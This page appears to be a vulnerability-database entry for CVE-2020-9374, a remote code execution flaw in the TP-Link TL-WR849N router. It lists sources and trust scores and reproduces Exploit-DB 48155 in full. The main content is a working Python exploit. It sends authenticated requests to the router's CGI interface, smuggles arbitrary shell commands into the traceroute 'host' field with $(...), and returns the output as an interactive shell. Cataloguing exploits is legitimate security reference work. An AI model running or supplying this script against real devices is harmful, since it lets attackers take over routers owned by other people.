Sign-up

ID

VAR-E-202003-0038


CVE

cve_id:CVE-2020-9374

Trust: 1.5

sources: PACKETSTORM: 156584 // EXPLOIT-DB: 48155

EDB ID

48155


TITLE

TP LINK TL-WR849N - Remote Code Execution - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 48155

DESCRIPTION

TP LINK TL-WR849N - Remote Code Execution. CVE-2020-9374 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 48155

AFFECTED PRODUCTS

vendor:tpmodel:link tl-wr849nscope: - version: -

Trust: 1.6

vendor:tp linkmodel:tl-wr849nscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 156584 // EXPLOIT-DB: 48155 // EDBNET: 102693

EXPLOIT

# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-2020-9374

import requests

def output(headers,cookies):
url = 'http://192.168.0.1/cgi?1'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
data += 'diagnosticsState\x0d\x0a'
data += 'X_TP_HopSeq\x0d\x0a'
data += 'X_TP_Result\x0d\x0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
saida = r.text
filtro = saida.replace(': Name or service not known','')
filtro = filtro.replace('[0,0,0,0,0,0]0','')
filtro = filtro.replace('diagnosticsState=','')
filtro = filtro.replace('X_TP_HopSeq=0','')
filtro = filtro.replace('X_TP_Result=','')
print(filtro[:-8])

def aceppt(headers,cookies):
url = 'http://192.168.0.1/cgi?7'
data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
output(headers,cookies)

def inject(command,headers,cookies):
url = 'http://192.168.0.1/cgi?2'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
data += 'maxHopCount=20\x0d\x0a'
data += 'timeout=5\x0d\x0a'
data += 'numberOfTries=1\x0d\x0a'
data += 'host=\"$('+command+')\"\x0d\x0a'
data += 'dataBlockSize=64\x0d\x0a'
data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
data += 'diagnosticsState=Requested\x0d\x0a'
data += 'X_TP_HopSeq=0\x0d\x0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
aceppt(headers,cookies)

def main():
cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
headers = {'Content-Type': 'text/plain',
'Referer': 'http://192.168.0.1/mainFrame.htm'}
while True:
command = input('$ ')
inject(command,headers,cookies)

main()

Trust: 1.0

sources: EXPLOIT-DB: 48155

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 48155

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 48155

TYPE

Remote Code Execution

Trust: 1.6

sources: EXPLOIT-DB: 48155 // EDBNET: 102693

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 156584

CREDITS

Elber Tavares

Trust: 0.6

sources: EXPLOIT-DB: 48155

EXTERNAL IDS

db:EXPLOIT-DBid:48155

Trust: 1.6

db:NVDid:CVE-2020-9374

Trust: 1.5

db:EDBNETid:102693

Trust: 0.6

db:PACKETSTORMid:156584

Trust: 0.5

sources: PACKETSTORM: 156584 // EXPLOIT-DB: 48155 // EDBNET: 102693

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2020-9374

Trust: 1.5

url:https://www.exploit-db.com/exploits/48155/

Trust: 0.6

sources: PACKETSTORM: 156584 // EXPLOIT-DB: 48155 // EDBNET: 102693

SOURCES

db:PACKETSTORMid:156584
db:EXPLOIT-DBid:48155
db:EDBNETid:102693

LAST UPDATE DATE

2022-07-27T09:44:31.973000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:156584date:2020-03-02T15:25:02
db:EXPLOIT-DBid:48155date:2020-03-02T00:00:00
db:EDBNETid:102693date:2020-03-02T00:00:00